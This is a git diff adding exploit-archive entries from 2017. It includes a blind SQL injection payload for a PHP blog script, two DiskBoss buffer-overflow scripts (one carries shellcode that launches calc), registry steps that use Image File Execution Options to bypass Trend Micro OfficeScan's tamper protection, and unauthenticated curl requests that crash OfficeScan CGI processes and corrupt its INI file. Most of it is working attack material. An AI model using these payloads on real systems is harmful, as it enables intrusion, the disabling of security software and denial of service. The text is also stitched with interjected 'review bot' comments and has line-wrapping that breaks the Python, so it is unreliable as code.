+Vendor Notification: June 2, 2017
+Vendor releases fixes / advisory : September 27, 2017
+September 28, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/platforms/php/webapps/42919.txt b/platforms/php/webapps/42919.txt
new file mode 100755
index 000000000..8f5940181
--- /dev/null
+++ b/platforms/php/webapps/42919.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Easy Blog PHP Script v1.3a - SQL Injection
+# Date: 2017-09-27
+# Exploit Author: 8bitsec
+# Vendor Homepage: https://www.codester.com/
+# Software Link: https://www.codester.com/items/4616/easy-blog-php-script
+# Version: 1.3a
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-09-27
+
+Product & Service Introduction:
+===============================
+A simple and easy to setup script that allows you to have your own basic blog that comes packed with professional features.
+
+Technical Details & Description:
+================================
+
+SQL injection on [id] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+http://localhost/[path]/article.php?id=8' AND 7160=7160 AND 'cbgz'='cbgz
+
+Parameter: id (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: id=8' AND 7160=7160 AND 'cbgz'='cbgz
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]
\ No newline at end of file
diff --git a/platforms/windows/dos/42917.py b/platforms/windows/dos/42917.py
new file mode 100755
index 000000000..d2a320152
--- /dev/null
+++ b/platforms/windows/dos/42917.py
@@ -0,0 +1,32 @@
+#!/usr/bin/python
+
+#========================================================================================================================
+# Exploit Author: Touhid M.Shaikh
+# Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer Overflow(PoC)
+# Date: 28-09-2017
+# Website: www.touhidshaikh.com
+# Vulnerable Software: DiskBoss Enterprise v8.4.16
+# Vendor Homepage: http://www.diskboss.com
+# Version: v8.4.16
+# Software Link: http://www.diskboss.com/downloads.html
+# Tested On: Windows 7 x86
+#
+#
+# To reproduce the exploit:
+# 1. Click Server
+# 2. Click Connect
+# 3. In the "Share Name" field, paste the content of buffer.txt , And try
+to connect.........BOOoom....
+#
+#========================================================================================================================
+
+
+junk = "A"*1312
+
+EIP = "B"*4 #EIP overwritten
+
+b = junk+EIP+"D"*500
+
+f = open('buffer.txt','w')
+f.write(b)
+f.close()
diff --git a/platforms/windows/local/42890.txt b/platforms/windows/local/42890.txt
new file mode 100755
index 000000000..b8d8b10dd
--- /dev/null
+++ b/platforms/windows/local/42890.txt
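Review bot: The header comment in 42917.py is broken at `And try` / `to connect.........BOOoom....`: the continuation line has no leading `#`, so as rendered here the file stops with a SyntaxError before the first assignment; it should read `# to connect.........BOOoom....` or be rejoined onto the `# 3.` line. The same wrapping damage appears in 42918.py, where the bare `Overflow` line in the header and the continuations after `shellcode =`, after `nops` in the `buf =` statement and inside the `file=` literal are lines that cannot parse either, which looks like transport line-wrapping rather than the author's intent. Separately, `f = open('buffer.txt','w')` / `f.write(b)` / `f.close()` is better written as `with open('buffer.txt', 'w') as f: f.write(b)`, which closes the file even if the write raises.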
@@ -0,0 +1,113 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-IMAGE-FILE-EXECUTION-BYPASS.txt
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+==================
+www.trendmicro.com
+
+
+
+Product:
+========
+OfficeScan
+v11.0 and XG (12.0)*
+
+
+OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
+An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
+manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
+web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.
+
+
+Vulnerability Type:
+===================
+Image File Execution Bypass
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Security Issue:
+================
+OfficeScan XG "Unauthorized Change Prevention Service" is a Local SYSTEM service that is supposed to protect OfficeScan processes
+like "PccNTMon.exe" from being terminated, and also prevents unauthorized arbitrary registry settings being made to the protected
+machine even by an Administrator.
+
+However, we can easily bypass by exploiting Windows Image File Execution Options (IFEO) to hijack the service process.
+IFEO has been used by malwares for some time to prevent process from running or execute a process of an attackers choosing in
+place of the process the user expects.
+
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
+
+All an attacker needs to do is create a registry key in IFEO with the same name as "TMBMSRV.exe" which is used by the
+"Trend Micro Unauthorized Change Prevention Service" SYSTEM service. After creating this registry key we create a "string value"
+named debugger pointing to say "calc.exe", we wait and once system reboots BOOM!
+
+
+References:
+===========
+https://success.trendmicro.com/solution/1118372
+
+
+
+Exploit/POC:
+=============
+
+Reproduction:
+
+1) Open registry
+
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
+
+2) Create a new Key with no name
+
+3) Create a new string value under the new key named "debugger" with value of c:\Windows\system32\calc.exe
+
+4) Rename the created key to TMBMSRV.exe
+
+5) Reboot system
+
+Done!
+
+We can then not only Kill TM but write to TrendMicro whitelist key in the registry for our evil binary to be left alone in peace.
+
+
+
+Network Access:
+===============
+Local
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+=================================
+Vendor Notification: June 28, 2017
+Vendor Reply: "Officescan Build 1222 which is affected by this bug was already pulled and is no longer available for public download"
+Vendor Reply: "created hotfixes for product improvement."
+September 28, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/platforms/windows/local/42918.py b/platforms/windows/local/42918.py
new file mode 100755
index 000000000..dfdf2b82a
--- /dev/null
+++ b/platforms/windows/local/42918.py
@@ -0,0 +1,68 @@ +#!/usr/bin/python + +#======================================================================================================================== +# Exploit Author: Touhid M.Shaikh +# Exploit Title: DiskBoss Enterprise v8.4.16 "Import Command" Buffer +Overflow +# Date: 29-09-2017 +# Website: www.touhidshaikh.com +# Contact: https://github.com/touhidshaikh +# Vulnerable Software: DiskBoss Enterprise v8.4.16 +# Vendor Homepage: http://www.diskboss.com +# Version: v8.4.16 +# Software Link: http://www.diskboss.com/downloads.html +# Tested On: Windows 7 x86 +# +# +# To reproduce the exploit: +# 1. right Click, click on Import Command +# 2. select evil.xml , Booom Calc POPED up.. ;) +#======================================================================================================================== + + +import os,struct +import sys + +#offset to eip +junk = "A" * (1560) + +#JMP ESP (QtGui4.dll) +jmp1 = struct.pack('<L',0x651bb77a) + +#NOPS +nops = "\x90" + +#LEA EAX, [ESP+76] +esp = "\x8D\x44\x24\x4c" + +#JMP ESP +jmp2 = "\xFF\xE0" + +#Jump short 5 +nseh = "\x90\x90\xEB\x05" + +#POP POP RET +seh = struct.pack('<L',0x6501DE41) + +#CALC.EXE pop shellcode +shellcode = +"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7" + + +# FINAL PAYLOAD +buf = junk + jmp1 + nops * 16 + esp + jmp2 + nops * 90 + nseh + seh + nops +* 10 + shellcode + + +#FILE +file='<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + buf + +'\n</classify>' + + +f = open('evil.xml', 'w') +f.write(file) +f.close() + +#GREETZ ---------- +#Taushif(Brother) +#----------------- 
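Review bot: `file='<?xml version=...'` in 42918.py shadows the Python 2 `file` builtin and the handle is then opened without a context manager; rename the local and write the last three statements as `with open('evil.xml', 'w') as f: f.write(payload_xml)` so the file is closed even if the write raises. `import os,struct` and `import sys` bring in `os` and `sys`, neither of which is referenced anywhere in the hunk, so the imports can be reduced to `import struct`. The `#offset to eip` and `#JMP ESP (QtGui4.dll)` comments document the constants well; the `#NOPS` and `#FILE` ones add nothing and could be dropped for consistency.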
diff --git a/platforms/windows/webapps/42892.txt b/platforms/windows/webapps/42892.txt
new file mode 100755
index 000000000..cbc2a3854
--- /dev/null
+++ b/platforms/windows/webapps/42892.txt
@@ -0,0 +1,135 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14086-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-START-REMOTE-PROCESS-CODE-EXECUTION-MEM-CORRUPT.txt
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+==================
+www.trendmicro.com
+
+
+
+Product:
+========
+OfficeScan XG
+v11.0 and (12.0)*
+
+
+
+Vulnerability Type:
+===================
+Unauthorized Start Remote Process Code Execution
+Unauthorized Denial Of Service - INI Corruption
+
+OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
+An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
+manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
+web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.
+
+
+
+CVE Reference:
+==============
+CVE-2017-14086
+
+
+
+Security Issue:
+================
+Remote unauthenticated attackers who connect to the OfficeScan XG application can temporarily start the "fcgiOfcDDA.exe" executable
+this process will run for short time before dies, server disk space may also be consumed with dump files by making continous HTTP requests.
+
+
+References:
+===========
+https://success.trendmicro.com/solution/1118372
+
+
+
+Exploit/POC Start Remote Process Code Execution:
+================================================
+c:\> curl -k https://VICTIM-IP:4343/officescan/console/CGI/
+
+HTTP response:
+403 - Forbidden: Access is denied.
+You do not have permission to view this directory or page using the credentials that you supplied
+
+But, we can access it directly :)
+
+c:\> curl -v -k https://VICTIM-IP:4343/officescan/console/CGI/fcgiOfcDDA.exe
+
+HTTP Response:
+
+500 - Internal server error.
+There is a problem with the resource you are looking for, and it cannot be displayed.
+
+The EXE is called then runs for short time before .DMP is generated.
+
+fcgiOfcDDA.exe.6808.dmp
+
+The stored exception information can be accessed via .ecxr.
+(568.112c): Unknown exception - code c000000d (first/second chance not available)
+*** ERROR: Symbol file could not be found. Defaulted to export symbols for kernel32.dll -
+eax=00000000 ebx=0014f780 ecx=00000000 edx=00000000 esi=00000002 edi=00000000
+eip=77d9016d esp=0014f730 ebp=0014f7cc iopl=0 nv up ei pl zr na pe nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
+ntdll!NtWaitForMultipleObjects+0x15:
+
+
+
+Exploit/POC (Denial Of Service / INI Corruption):
+==================================================
+[root@localhost /]# curl -v -k https://VICTIM-IP:4343/officescan/CGI/cgiRqUpd.exe
+* About to connect() to VICTIM-IP port 4343
+* Trying VICTIM-IP.. connected
+
+
+<HTTP/1.1 200 OK
+< Pragma: no-cache
+< Content-Type: text/plain;charset=iso-8859-1
+< Server: Microsoft-IIS/7.5
+< X-Powered-By: ASP.NET
+< Date: Fri, 02 Jun 2017 18:00:36 GMT
+< Connection: close
+< Content-Length: 22
+
+[INI_UPDATE_SECTION]
+
+
+BOOOM!
+
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: June 2, 2017
+Vendor releases fixes / advisory : September 27, 2017
+September 28, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file